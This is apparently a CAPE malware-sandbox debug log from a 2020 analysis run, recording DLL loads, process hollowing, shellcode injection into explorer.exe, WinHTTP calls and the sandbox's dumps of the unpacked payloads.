2020-03-24 09:48:18,101 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x03E90020.
2020-03-24 09:48:18,131 [root] DEBUG: DumpProcess: Module entry point VA is 0x00001644.
2020-03-24 09:48:18,131 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\2980_5894975443881924232020
2020-03-24 09:48:18,131 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3d400.
2020-03-24 09:48:18,131 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x3e90020.
2020-03-24 09:48:18,164 [root] DEBUG: TestPERequirements: Characteristics bad. (0x1fcae57)
2020-03-24 09:48:18,164 [root] DEBUG: TestPERequirements: FileAlignment invalid. (0x1fcae57)
2020-03-24 09:48:18,178 [root] DEBUG: TestPERequirements: Characteristics bad. (0x1fcadc7)
2020-03-24 09:48:18,194 [root] DEBUG: TestPERequirements: FileAlignment invalid. (0x1fcadc7)
2020-03-24 09:48:18,210 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x1fa1d8c-0x1fe0000.
2020-03-24 09:48:18,226 [root] DEBUG: DumpSectionView: Dumped PE image from shared section view with local address 0x01F30000.
2020-03-24 09:48:18,242 [root] DEBUG: DropSectionView: removed the view from the end of the section view list.
2020-03-24 09:48:18,256 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 1308.
2020-03-24 09:48:18,273 [root] DEBUG: DumpSectionViewsForPid: no shared section views found for pid 1308.
2020-03-24 09:48:18,288 [root] DEBUG: set_caller_info: Adding region at 0x0000000000230000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:18,288 [root] DEBUG: DLL loaded at 0x000007FEFE400000: C:\Windows\system32\OLEAUT32 (0xd7000 bytes).
2020-03-24 09:48:18,288 [root] DEBUG: DLL unloaded from 0x75700000.
2020-03-24 09:48:18,288 [root] INFO: Notified of termination of process with pid 2980.
2020-03-24 09:48:18,288 [root] DEBUG: DLL unloaded from 0x75700000.
2020-03-24 09:48:18,288 [root] INFO: Notified of termination of process with pid 2888.
2020-03-24 09:48:18,303 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 1308, handle 0xac.
2020-03-24 09:48:18,319 [root] DEBUG: OpenProcessHandler: Image base for process 1308 (handle 0xac): 0x00000000FF8E0000.
2020-03-24 09:48:18,319 [root] DEBUG: ResumeThreadHandler: Dumping hollowed process 1308, image base 0x00000000FF8E0000.
2020-03-24 09:48:18,319 [root] DEBUG: DLL unloaded from 0x75700000.
2020-03-24 09:48:18,319 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FF8E0000.
2020-03-24 09:48:18,319 [root] INFO: Notified of termination of process with pid 1016.
2020-03-24 09:48:18,319 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000000246C.
2020-03-24 09:48:18,335 [root] DEBUG: DLL loaded at 0x000007FEFD1C0000: C:\Windows\system32\cryptbase (0xf000 bytes).
2020-03-24 09:48:18,351 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\1308_14175218561881924232020
2020-03-24 09:48:18,351 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x6600.
2020-03-24 09:48:18,351 [root] DEBUG: ResumeThreadHandler: Dumped PE image from buffer.
2020-03-24 09:48:18,351 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 1308.
2020-03-24 09:48:18,365 [root] DEBUG: DumpSectionViewsForPid: no shared section views found for pid 1308.
2020-03-24 09:48:18,365 [root] DEBUG: set_caller_info: Adding region at 0x0000000000340000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:18,365 [root] DEBUG: set_caller_info: Adding region at 0x00000000038C0000 to caller regions list (ntdll::NtClose).
2020-03-24 09:48:18,365 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xf4 amd local view 0x0000000003CC0000 to global list ().
2020-03-24 09:48:18,398 [root] DEBUG: DLL loaded at 0x000007FEF4350000: C:\Windows\system32\WINHTTP (0x71000 bytes).
2020-03-24 09:48:18,444 [root] DEBUG: DLL loaded at 0x000007FEF4240000: C:\Windows\system32\webio (0x64000 bytes).
2020-03-24 09:48:18,476 [root] DEBUG: DLL loaded at 0x000007FEFDE90000: C:\Windows\system32\WS2_32 (0x4d000 bytes).
2020-03-24 09:48:18,490 [root] DEBUG: DLL loaded at 0x000007FEFDF00000: C:\Windows\system32\NSI (0x8000 bytes).
2020-03-24 09:48:18,506 [root] DEBUG: DLL unloaded from 0x0000000077260000.
2020-03-24 09:48:18,506 [root] DEBUG: DLL loaded at 0x000007FEFCB60000: C:\Windows\system32\cryptsp (0x17000 bytes).
2020-03-24 09:48:18,522 [root] DEBUG: DLL loaded at 0x000007FEFC760000: C:\Windows\system32\credssp (0xa000 bytes).
2020-03-24 09:48:18,538 [root] DEBUG: DLL unloaded from 0x000007FEFCB60000.
2020-03-24 09:48:18,538 [root] DEBUG: DLL loaded at 0x000007FEFCB00000: C:\Windows\system32\mswsock (0x55000 bytes).
2020-03-24 09:48:18,553 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2020-03-24 09:48:18,553 [root] DEBUG: DLL loaded at 0x000007FEFCAF0000: C:\Windows\System32\wship6 (0x7000 bytes).
2020-03-24 09:48:18,569 [root] DEBUG: DLL loaded at 0x000007FEFC980000: C:\Windows\system32\DNSAPI (0x5b000 bytes).
2020-03-24 09:48:18,569 [root] DEBUG: DLL loaded at 0x000007FEFB1A0000: C:\Windows\system32\IPHLPAPI (0x27000 bytes).
2020-03-24 09:48:18,585 [root] DEBUG: DLL loaded at 0x000007FEFB190000: C:\Windows\system32\WINNSI (0xb000 bytes).
2020-03-24 09:48:18,599 [root] DEBUG: DLL loaded at 0x000007FEFA590000: C:\Windows\system32\rasadhlp (0x8000 bytes).
2020-03-24 09:48:18,881 [root] DEBUG: DLL loaded at 0x000007FEFB0F0000: C:\Windows\System32\fwpuclnt (0x53000 bytes).
2020-03-24 09:48:21,532 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\schannel (0x57000 bytes).
2020-03-24 09:48:21,549 [root] DEBUG: DLL loaded at 0x000007FEFD410000: C:\Windows\system32\CRYPT32 (0x167000 bytes).
2020-03-24 09:48:21,549 [root] DEBUG: DLL loaded at 0x000007FEFD370000: C:\Windows\system32\MSASN1 (0xf000 bytes).
2020-03-24 09:48:23,436 [root] DEBUG: DLL loaded at 0x000007FEFCF60000: C:\Windows\system32\secur32 (0xb000 bytes).
2020-03-24 09:48:23,467 [root] DEBUG: DLL loaded at 0x000007FEFCCE0000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2020-03-24 09:48:23,483 [root] DEBUG: DLL loaded at 0x000007FEFCCB0000: C:\Windows\system32\bcrypt (0x22000 bytes).
2020-03-24 09:48:23,483 [root] DEBUG: DLL loaded at 0x000007FEFC7A0000: C:\Windows\system32\bcryptprimitives (0x4c000 bytes).
2020-03-24 09:48:23,513 [root] DEBUG: DLL loaded at 0x000007FEFC610000: C:\Windows\system32\USERENV (0x1e000 bytes).
2020-03-24 09:48:23,513 [root] DEBUG: DLL loaded at 0x000007FEFD290000: C:\Windows\system32\profapi (0xf000 bytes).
2020-03-24 09:48:23,576 [root] DEBUG: DLL loaded at 0x000007FEFC5F0000: C:\Windows\system32\GPAPI (0x1b000 bytes).
2020-03-24 09:48:23,670 [root] DEBUG: DLL loaded at 0x000007FEFA9B0000: C:\Windows\system32\cryptnet (0x26000 bytes).
2020-03-24 09:48:23,670 [root] DEBUG: DLL loaded at 0x000007FEFE1F0000: C:\Windows\system32\WLDAP32 (0x52000 bytes).
2020-03-24 09:48:23,670 [root] DEBUG: DLL loaded at 0x000007FEFA5E0000: C:\Windows\system32\SensApi (0x9000 bytes).
2020-03-24 09:48:23,779 [root] DEBUG: DLL loaded at 0x000007FEFDCB0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:48:23,779 [root] DEBUG: DLL loaded at 0x000007FEFD660000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:48:23,779 [root] DEBUG: DLL loaded at 0x000007FEFD3F0000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:48:23,825 [root] DEBUG: DLL loaded at 0x000007FEF4330000: C:\Windows\system32\Cabinet (0x1b000 bytes).
2020-03-24 09:48:23,842 [root] DEBUG: DLL loaded at 0x000007FEFC630000: C:\Windows\system32\DEVRTL (0x12000 bytes).
2020-03-24 09:48:23,872 [root] DEBUG: DLL unloaded from 0x000007FEFDCB0000.
2020-03-24 09:48:23,872 [root] DEBUG: DLL loaded at 0x000007FEFCB60000: C:\Windows\system32\CRYPTSP (0x17000 bytes).
2020-03-24 09:48:23,888 [root] DEBUG: DLL loaded at 0x000007FEFC860000: C:\Windows\system32\rsaenh (0x47000 bytes).
2020-03-24 09:48:23,904 [root] DEBUG: DLL loaded at 0x000007FEFDCB0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:48:23,904 [root] DEBUG: DLL loaded at 0x000007FEFD660000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:48:23,904 [root] DEBUG: DLL loaded at 0x000007FEFD3F0000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:48:23,950 [root] DEBUG: DLL loaded at 0x000007FEFB000000: C:\Windows\system32\dhcpcsvc6 (0x11000 bytes).
2020-03-24 09:48:23,967 [root] DEBUG: DLL loaded at 0x000007FEFAEC0000: C:\Windows\system32\dhcpcsvc (0x18000 bytes).
2020-03-24 09:48:23,967 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2020-03-24 09:48:23,982 [root] DEBUG: DLL loaded at 0x000007FEFD660000: C:\Windows\system32\CFGMGR32 (0x36000 bytes).
2020-03-24 09:48:23,982 [root] DEBUG: DLL unloaded from 0x000007FEF4350000.
2020-03-24 09:48:23,982 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x398 amd local view 0x0000000000150000 to global list ().
2020-03-24 09:48:23,997 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2020-03-24 09:48:23,997 [root] DEBUG: DLL unloaded from 0x000007FEF4350000.
2020-03-24 09:48:26,384 [root] DEBUG: DLL unloaded from 0x000007FEFA9B0000.
2020-03-24 09:48:26,400 [root] DEBUG: DLL loaded at 0x000007FEFDCB0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:48:26,400 [root] DEBUG: DLL loaded at 0x000007FEFD3F0000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:48:26,431 [root] DEBUG: DLL unloaded from 0x000007FEFDCB0000.
2020-03-24 09:48:28,303 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2020-03-24 09:48:28,303 [root] DEBUG: DLL unloaded from 0x000007FEF4350000.
2020-03-24 09:48:28,303 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2020-03-24 09:48:28,303 [root] DEBUG: DLL unloaded from 0x000007FEF4350000.
2020-03-24 09:48:29,644 [root] DEBUG: DLL unloaded from 0x000007FEFA9B0000.
2020-03-24 09:48:29,661 [root] DEBUG: DLL loaded at 0x000007FEFDCB0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:48:29,661 [root] DEBUG: DLL loaded at 0x000007FEFD3F0000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:48:29,691 [root] DEBUG: DLL unloaded from 0x000007FEFDCB0000.
2020-03-24 09:48:29,691 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2020-03-24 09:48:29,707 [root] DEBUG: DLL unloaded from 0x000007FEF4350000.
2020-03-24 09:48:29,707 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2020-03-24 09:48:29,707 [root] DEBUG: DLL unloaded from 0x000007FEF4350000.
2020-03-24 09:48:30,207 [root] DEBUG: DLL unloaded from 0x000007FEFA9B0000.
2020-03-24 09:48:30,221 [root] DEBUG: DLL loaded at 0x000007FEFDCB0000: C:\Windows\system32\setupapi (0x1d7000 bytes).
2020-03-24 09:48:30,221 [root] DEBUG: DLL loaded at 0x000007FEFD3F0000: C:\Windows\system32\DEVOBJ (0x1a000 bytes).
2020-03-24 09:48:30,237 [root] DEBUG: DLL unloaded from 0x000007FEFDCB0000.
2020-03-24 09:48:31,095 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 1708, handle 0xfc.
2020-03-24 09:48:31,095 [root] DEBUG: OpenProcessHandler: Image base for process 1708 (handle 0xfc): 0x00000000FFA80000.
2020-03-24 09:48:31,095 [root] INFO: Announced 64-bit process name: explorer.exe pid: 1708
2020-03-24 09:48:31,111 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-03-24 09:48:31,111 [lib.api.process] INFO: 64-bit DLL to inject is C:\xkrjyge\dll\XfVPsKv.dll, loader C:\xkrjyge\bin\ACICoeBS.exe
2020-03-24 09:48:31,111 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\PgWoVOst.
2020-03-24 09:48:31,111 [root] DEBUG: Loader: Injecting process 1708 (thread 2908) with C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:31,111 [root] DEBUG: Process image base: 0x00000000FFA80000
2020-03-24 09:48:31,111 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-03-24 09:48:31,111 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-03-24 09:48:31,127 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-03-24 09:48:31,127 [root] DEBUG: Process dumps disabled.
2020-03-24 09:48:31,127 [root] INFO: Disabling sleep skipping.
2020-03-24 09:48:31,142 [root] WARNING: Unable to place hook on LockResource
2020-03-24 09:48:31,142 [root] WARNING: Unable to hook LockResource
2020-03-24 09:48:31,174 [root] DEBUG: CAPE initialised: 64-bit Injection package loaded in process 1708 at 0x0000000074660000, image base 0x00000000FFA80000, stack from 0x00000000045D2000-0x00000000045E0000
2020-03-24 09:48:31,190 [root] DEBUG: Commandline: C:\Windows\explorer.exe.
2020-03-24 09:48:31,190 [root] INFO: Added new process to list with pid: 1708
2020-03-24 09:48:31,190 [root] INFO: Monitor successfully loaded in process with pid 1708.
2020-03-24 09:48:31,190 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-03-24 09:48:31,190 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-03-24 09:48:31,190 [root] DEBUG: Successfully injected DLL C:\xkrjyge\dll\XfVPsKv.dll.
2020-03-24 09:48:31,190 [root] DEBUG: set_caller_info: Adding region at 0x00000000001B0000 to caller regions list (kernel32::VirtualProtectEx).
2020-03-24 09:48:31,190 [root] DEBUG: ResumeThreadHandler: Dumping hollowed process 1708, image base 0x00000000FFA80000.
2020-03-24 09:48:31,204 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00000000FFA80000.
2020-03-24 09:48:31,204 [root] DEBUG: DumpProcess: Module entry point VA is 0x000000000002B790.
2020-03-24 09:48:31,267 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\1308_445735271291924232020
2020-03-24 09:48:31,267 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x2baa00.
2020-03-24 09:48:31,267 [root] DEBUG: ResumeThreadHandler: Dumped PE image from buffer.
2020-03-24 09:48:31,267 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 1708.
2020-03-24 09:48:31,267 [root] DEBUG: DumpSectionViewsForPid: no shared section views found for pid 1708.
2020-03-24 09:48:31,267 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x128 amd local view 0x0000000004930000 to global list ().
2020-03-24 09:48:31,267 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0x128 to target process 1708 ().
2020-03-24 09:48:31,282 [root] DEBUG: set_caller_info: Adding region at 0x0000000002130000 to caller regions list (ntdll::NtAllocateVirtualMemory).
2020-03-24 09:48:31,282 [root] DEBUG: WriteMemoryHandler: shellcode at 0x0000000003CBC130 (size 0x318) injected into process 1708.
2020-03-24 09:48:31,282 [root] DEBUG: DumpMemory: CAPE output file successfully created: C:\gGNnZRIY\CAPE\1308_1770639630291924232020
2020-03-24 09:48:31,299 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\1308_1770639630291924232020
2020-03-24 09:48:31,299 [root] DEBUG: WriteMemoryHandler: Dumped injected code/data from buffer.
2020-03-24 09:48:31,299 [root] DEBUG: SetThreadContextHandler: Hollow process entry point reset via NtSetContextThread to 0x0000000000000000 (process 1708).
2020-03-24 09:48:31,299 [root] DEBUG: UnmapSectionViewHandler: Attempt to unmap view at 0x0000000004930000, dumping.
2020-03-24 09:48:31,299 [root] DEBUG: DumpPEsInRange: Scanning range 0x4930000 - 0x49e0000.
2020-03-24 09:48:31,299 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x4930000
2020-03-24 09:48:31,299 [root] DEBUG: SetCapeMetaData: Injection type with no PID - error.
2020-03-24 09:48:31,299 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:31,313 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000004930000.
2020-03-24 09:48:31,313 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001644.
2020-03-24 09:48:31,313 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\1308_1223342887291924232020
2020-03-24 09:48:31,329 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3d000.
2020-03-24 09:48:31,329 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x4930000.
2020-03-24 09:48:31,345 [root] DEBUG: TestPERequirements: Characteristics bad. (0x4959e07)
2020-03-24 09:48:31,345 [root] DEBUG: TestPERequirements: FileAlignment invalid. (0x4959e07)
2020-03-24 09:48:31,345 [root] DEBUG: TestPERequirements: Characteristics bad. (0x4959d77)
2020-03-24 09:48:31,345 [root] DEBUG: TestPERequirements: FileAlignment invalid. (0x4959d77)
2020-03-24 09:48:31,361 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x4971b94
2020-03-24 09:48:31,361 [root] DEBUG: DumpPEsInRange: Disguised PE image (bad MZ and/or PE headers) at 0x4971b94.
2020-03-24 09:48:31,361 [root] DEBUG: SetCapeMetaData: Injection type with no PID - error.
2020-03-24 09:48:31,361 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:31,361 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000004B70040.
2020-03-24 09:48:31,361 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001406.
2020-03-24 09:48:31,377 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\1308_1256936040291924232020
2020-03-24 09:48:31,377 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x2f400.
2020-03-24 09:48:31,377 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x4b70040.
2020-03-24 09:48:31,391 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x49a1b94
2020-03-24 09:48:31,391 [root] DEBUG: DumpPEsInRange: Disguised PE image (bad MZ and/or PE headers) at 0x49a1b94.
2020-03-24 09:48:31,391 [root] DEBUG: SetCapeMetaData: Injection type with no PID - error.
2020-03-24 09:48:31,391 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-03-24 09:48:31,407 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x0000000004B70040.
2020-03-24 09:48:31,407 [root] DEBUG: DumpProcess: Module entry point VA is 0x0000000000001644.
2020-03-24 09:48:31,424 [root] INFO: Added new CAPE file to list with path: C:\gGNnZRIY\CAPE\1308_1879770018291924232020
2020-03-24 09:48:31,424 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x3d400.
2020-03-24 09:48:31,424 [root] DEBUG: DumpPEsInRange: Dumped PE image from 0x4b70040.
2020-03-24 09:48:31,438 [root] DEBUG: TestPERequirements: Characteristics bad. (0x49cae5f)
2020-03-24 09:48:31,438 [root] DEBUG: TestPERequirements: FileAlignment invalid. (0x49cae5f)
2020-03-24 09:48:31,438 [root] DEBUG: TestPERequirements: Characteristics bad. (0x49cadcf)
2020-03-24 09:48:31,438 [root] DEBUG: TestPERequirements: FileAlignment invalid. (0x49cadcf)
2020-03-24 09:48:31,454 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x49a1d94-0x49e0000.
2020-03-24 09:48:31,454 [root] DEBUG: DumpSectionView: Dumped PE image from shared section view with local address 0x0000000004930000.
2020-03-24 09:48:31,454 [root] DEBUG: DropSectionView: removed the view from the end of the section view list.
2020-03-24 09:48:31,454 [root] DEBUG: ResumeThreadHandler: Dumping section view for process 1708.
2020-03-24 09:48:31,454 [root] DEBUG: DumpSectionViewsForPid: no shared section views found for pid 1708.
2020-03-24 09:48:31,454 [root] DEBUG: set_caller_info: Adding region at 0x0000000004560000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:31,454 [root] DEBUG: DLL unloaded from 0x000007FEFC7A0000.
2020-03-24 09:48:31,470 [root] DEBUG: DLL unloaded from 0x000007FEFCF60000.
2020-03-24 09:48:31,470 [root] DEBUG: OpenProcessHandler: Injection info created for Pid 1708, handle 0xb10.
2020-03-24 09:48:31,470 [root] DEBUG: OpenProcessHandler: Image base for process 1708 (handle 0xb10): 0x00000000FFA80000.
2020-03-24 09:48:31,470 [root] DEBUG: DLL unloaded from 0x000007FEFC8F0000.
2020-03-24 09:48:31,470 [root] DEBUG: set_caller_info: Adding region at 0x000000000C5A0000 to caller regions list (ntdll::NtClose).
2020-03-24 09:48:31,470 [root] DEBUG: DLL unloaded from 0x000007FEFC760000.
2020-03-24 09:48:31,486 [root] DEBUG: DLL unloaded from 0x000007FEFE6E0000.
2020-03-24 09:48:31,502 [root] INFO: Notified of termination of process with pid 1308.
2020-03-24 09:48:31,611 [root] DEBUG: DLL loaded at 0x000007FEF4350000: C:\Windows\system32\WINHTTP (0x71000 bytes).
2020-03-24 09:48:31,611 [root] DEBUG: DLL loaded at 0x000007FEF4240000: C:\Windows\system32\webio (0x64000 bytes).
2020-03-24 09:48:31,611 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4240000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:31,611 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4350000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:31,625 [root] DEBUG: DLL unloaded from 0x000007FEFD970000.
2020-03-24 09:48:31,625 [root] DEBUG: DLL unloaded from 0x0000000077260000.
2020-03-24 09:48:31,625 [root] DEBUG: set_caller_info: Adding region at 0x0000000004030000 to caller regions list (winhttp::WinHttpConnect).
2020-03-24 09:48:31,625 [root] DEBUG: set_caller_info: Adding region at 0x0000000004030000 to caller regions list (winhttp::WinHttpConnect).
2020-03-24 09:48:31,625 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFDE90000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:31,625 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCB00000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:31,641 [root] DEBUG: DLL loaded at 0x000007FEFC500000: C:\Windows\System32\wshtcpip (0x7000 bytes).
2020-03-24 09:48:31,641 [root] DEBUG: DLL loaded at 0x000007FEFCAF0000: C:\Windows\System32\wship6 (0x7000 bytes).
2020-03-24 09:48:31,641 [root] DEBUG: set_caller_info: Adding region at 0x0000000007090000 to caller regions list (winhttp::WinHttpOpenRequest).
2020-03-24 09:48:31,641 [root] DEBUG: set_caller_info: Adding region at 0x0000000007490000 to caller regions list (winhttp::WinHttpSetOption).
2020-03-24 09:48:31,641 [root] DEBUG: set_caller_info: Adding region at 0x0000000007490000 to caller regions list (winhttp::WinHttpSendRequest).
2020-03-24 09:48:31,641 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC980000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:31,641 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC980000 to caller regions list (ntdll::LdrLoadDll).
2020-03-24 09:48:31,657 [root] DEBUG: DLL loaded at 0x000007FEFA590000: C:\Windows\system32\rasadhlp (0x8000 bytes).
2020-03-24 09:48:31,657 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA590000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:31,657 [root] DEBUG: DLL unloaded from 0x000007FEFB1A0000.
2020-03-24 09:48:32,141 [root] DEBUG: DLL loaded at 0x000007FEFB0F0000: C:\Windows\System32\fwpuclnt (0x53000 bytes).
2020-03-24 09:48:32,141 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFB0F0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:34,325 [root] DEBUG: DLL loaded at 0x000007FEFC8F0000: C:\Windows\system32\schannel (0x57000 bytes).
2020-03-24 09:48:34,325 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC8F0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:35,963 [root] DEBUG: DLL loaded at 0x000007FEFCCE0000: C:\Windows\system32\ncrypt (0x4e000 bytes).
2020-03-24 09:48:35,963 [root] DEBUG: DLL loaded at 0x000007FEFCCB0000: C:\Windows\system32\bcrypt (0x22000 bytes).
2020-03-24 09:48:35,979 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCCE0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:35,979 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFCCB0000 to caller regions list (ntdll::NtDeviceIoControlFile).
2020-03-24 09:48:35,979 [root] DEBUG: DLL loaded at 0x000007FEFC7A0000: C:\Windows\system32\bcryptprimitives (0x4c000 bytes).
2020-03-24 09:48:36,040 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFC5F0000 to caller regions list (advapi32::RegOpenKeyExW).
2020-03-24 09:48:36,056 [root] DEBUG: DLL loaded at 0x000007FEFA9B0000: C:\Windows\system32\cryptnet (0x26000 bytes).
2020-03-24 09:48:36,056 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA9B0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:36,072 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFA5E0000 to caller regions list (ntdll::NtOpenSection).
2020-03-24 09:48:36,088 [root] DEBUG: DLL loaded at 0x000007FEF4330000: C:\Windows\system32\Cabinet (0x1b000 bytes).
2020-03-24 09:48:36,088 [root] DEBUG: set_caller_info: Adding region at 0x000007FEF4330000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:36,118 [root] DEBUG: DLL unloaded from 0x000007FEFDCB0000.
2020-03-24 09:48:36,181 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFB000000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:36,181 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFB1A0000 to caller regions list (kernel32::GetSystemTimeAsFileTime).
2020-03-24 09:48:36,197 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2020-03-24 09:48:36,197 [root] DEBUG: set_caller_info: Adding region at 0x000007FEFDF00000 to caller regions list (ntdll::NtCreateEvent).
2020-03-24 09:48:36,197 [root] DEBUG: DLL unloaded from 0x000007FEF4350000.
2020-03-24 09:48:36,213 [root] DEBUG: MapSectionViewHandler: Added section view with handle 0xfc4 amd local view 0x0000000002790000 to global list ().
2020-03-24 09:48:36,213 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2020-03-24 09:48:36,227 [root] DEBUG: DLL unloaded from 0x000007FEF4350000.
2020-03-24 09:48:37,631 [root] DEBUG: DLL unloaded from 0x000007FEFA9B0000.
2020-03-24 09:48:37,678 [root] DEBUG: DLL unloaded from 0x000007FEFDCB0000.
2020-03-24 09:48:37,773 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2020-03-24 09:48:37,773 [root] DEBUG: DLL unloaded from 0x000007FEF4350000.
2020-03-24 09:48:37,788 [root] DEBUG: DLL unloaded from 0x0000000077380000.
2020-03-24 09:48:37,788 [root] DEBUG: DLL unloaded from 0x000007FEF4350000.
2020-03-24 09:48:38,334 [root] DEBUG: DLL unloaded from 0x000007FEFA9B0000.
2020-03-24 09:48:38,397 [root] DEBUG: DLL unloaded from 0x000007FEFDCB0000.
2020-03-24 09:48:39,082 [root] DEBUG: set_caller_info: Adding region at 0x00000000000D0000 to caller regions list (user32::SetWindowLongPtrA).
2020-03-24 09:49:39,081 [root] DEBUG: DLL unloaded from 0x000007FEF4350000.
2020-03-24 09:50:30,108 [root] INFO: Analysis timeout hit (200 seconds), terminating analysis.
2020-03-24 09:50:30,108 [root] INFO: Created shutdown mutex.
2020-03-24 09:50:31,122 [lib.api.process] INFO: Terminate event set for process 1708
2020-03-24 09:50:31,122 [root] DEBUG: Terminate Event: Skipping dump of process 1708
2020-03-24 09:50:31,122 [lib.api.process] INFO: Termination confirmed for process 1708
2020-03-24 09:50:31,122 [root] DEBUG: Terminate Event: CAPE shutdown complete for process 1708
2020-03-24 09:50:31,122 [root] INFO: Terminate event set for process 1708.
2020-03-24 09:50:31,122 [root] INFO: Terminating process 1708 before shutdown.
2020-03-24 09:50:31,122 [root] INFO: Waiting for process 1708 to exit.
2020-03-24 09:50:32,125 [root] INFO: Shutting down package.
2020-03-24 09:50:32,125 [root] INFO: Stopping auxiliary modules.
2020-03-24 09:50:32,125 [root] INFO: Finishing auxiliary modules.
